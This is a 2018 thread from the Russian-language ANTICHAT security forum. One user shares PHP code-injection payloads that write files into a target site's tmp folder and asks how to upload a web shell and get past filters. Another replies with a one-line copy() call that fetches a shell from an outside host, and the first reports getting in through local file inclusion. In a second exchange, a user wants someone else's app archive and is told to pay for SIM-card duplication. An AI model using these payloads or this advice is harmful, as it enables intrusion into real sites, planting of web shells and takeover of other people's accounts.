HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 12.09.2018, 23:18
zifus
Познающий
Регистрация: 15.08.2015
Сообщений: 83
Провел на форуме:
17650

Репутация: 0
По умолчанию

Цитата:
Сообщение от Sensoft  

то есть я себя позорю, а ты вопросом который можно выполнить только чёрной магией это тип норм
Не хуя нету но хочешь что то получить
л - логика
На вопрос ТС "Мне необходимо узнать, возможно ли" есть 3 ответа

1. Да

2. Нет

3. Может быть

А способов можно найти много, вплоть до того что дать по голове и забрать устройство где стоит приложение.
 
Ответить с цитированием

  #2  
Старый 15.09.2018, 17:31
likepro
Новичок
Регистрация: 09.05.2015
Сообщений: 22
Провел на форуме:
4346

Репутация: 0
По умолчанию

Цитата:
Сообщение от Angelika  

Мне нужно получить чужой архив, доступа к приложению нет никакого.
Вообще можно, стоимость такого 150-200 вам нужно искать тех кто умеет делать дубликат сим. Детали уже по ходу дела вам объяснят.
 
Ответить с цитированием

  #3  
Старый 20.09.2018, 16:08
Sensoft
Постоянный
Регистрация: 14.06.2015
Сообщений: 396
Провел на форуме:
104689

Репутация: 1
По умолчанию

Есть PHP code injection

там все функции на загрузку или запись выключены

пишется только в папку tmp

/page1';$b=fopen('/var/www/ru/tmp/333.php','w');fwrite($b,%20'111text');$a='

Вызывается

page1';$b=file_get_contents('/var/www/ru/tmp/333.php');echo%20$b;$a='

Как залить что то весомое ? как можно обойти фильтры ?

если записать в файл пхп код то выдает ошибку Parse error: syntax error, unexpected ';'

/page1';$b=fopen('/var/www/ru/tmp/333.php','w');fwrite($b, '');$a='
 
Ответить с цитированием

  #4  
Старый 20.09.2018, 17:42
Angelika
Новичок
Регистрация: 08.09.2018
Сообщений: 5
Провел на форуме:
1889

Репутация: 0
По умолчанию

Цитата:
Сообщение от likepro  

Вообще можно, стоимость такого 150-200 вам нужно искать тех кто умеет делать дубликат сим. Детали уже по ходу дела вам объяснят.
Спасибо за ответ! А стоимость Вы в чем указали? В тысячах рублей?
 
Ответить с цитированием

  #5  
Старый 20.09.2018, 20:42
dmax0fw
Участник форума
Регистрация: 31.12.2017
Сообщений: 107
Провел на форуме:
20361

Репутация: 46
По умолчанию

Цитата:
Сообщение от Sensoft  

если записать в файл пхп код то выдает ошибку
Parse error: syntax error, unexpected ';'
возможно дело в short_open_tag

попробуй записать так

PHP код:
[COLOR="#000000"]fwrite($b, '[COLOR="#0000BB"][/COLOR]');[/COLOR
 
Ответить с цитированием

  #6  
Старый 20.09.2018, 20:54
Sensoft
Постоянный
Регистрация: 14.06.2015
Сообщений: 396
Провел на форуме:
104689

Репутация: 1
По умолчанию

Цитата:
Сообщение от dmax0fw  

возможно дело в short_open_tag
попробуй записать так
PHP код:
[COLOR="#000000"]fwrite($b, '[COLOR="#0000BB"][/COLOR]');[/COLOR
Нет, та же ошибка
 
Ответить с цитированием

  #7  
Старый 20.09.2018, 20:55
karkajoi
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
Провел на форуме:
96779

Репутация: 5
По умолчанию

Цитата:
Сообщение от Sensoft  

Нет, та же ошибка
Цитата:
Сообщение от dmax0fw  

возможно дело в short_open_tag
попробуй записать так
PHP код:
[COLOR="#000000"]fwrite($b, '[COLOR="#0000BB"][/COLOR]');[/COLOR
Ругается именно на , если просто текст записать, то пишет.
 
Ответить с цитированием

  #8  
Старый 21.09.2018, 05:03
likepro
Новичок
Регистрация: 09.05.2015
Сообщений: 22
Провел на форуме:
4346

Репутация: 0
По умолчанию

Цитата:
Сообщение от Angelika  

Спасибо за ответ! А стоимость Вы в чем указали? В тысячах рублей?
Да
 
Ответить с цитированием

  #9  
Старый 28.09.2018, 03:49
neur0funk
Новичок
Регистрация: 09.05.2018
Сообщений: 22
Провел на форуме:
5363

Репутация: 12
По умолчанию

у него RCE а он шелл залить не может, дожили, хакеры пля, а каким сканером нашел?

copy('http://lol.com/shell.txt','/pwd/shell.php');
 
Ответить с цитированием

  #10  
Старый 28.09.2018, 09:56
karkajoi
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
Провел на форуме:
96779

Репутация: 5
По умолчанию

Цитата:
Сообщение от neur0funk  

у него RCE а он шелл залить не может, дожили, хакеры пля, а каким сканером нашел?
copy('
http://lol.com/shell.txt','/pwd/shell.php');
copy system eval и так далее выключены. Уже залился через локал инклуид.

Если бы было так просто я бы не спрашивал.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Задай Вопрос - Получи Ответ] ZAMUT Уязвимости CMS / форумов 316 08.06.2010 09:56
Интернетчики задали российскому президенту очень странные вопросы podkashey Мировые новости. Обсуждения. 4 07.07.2006 16:53
Простой вопрос про сниффер errou PHP 15 30.01.2006 20:54



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.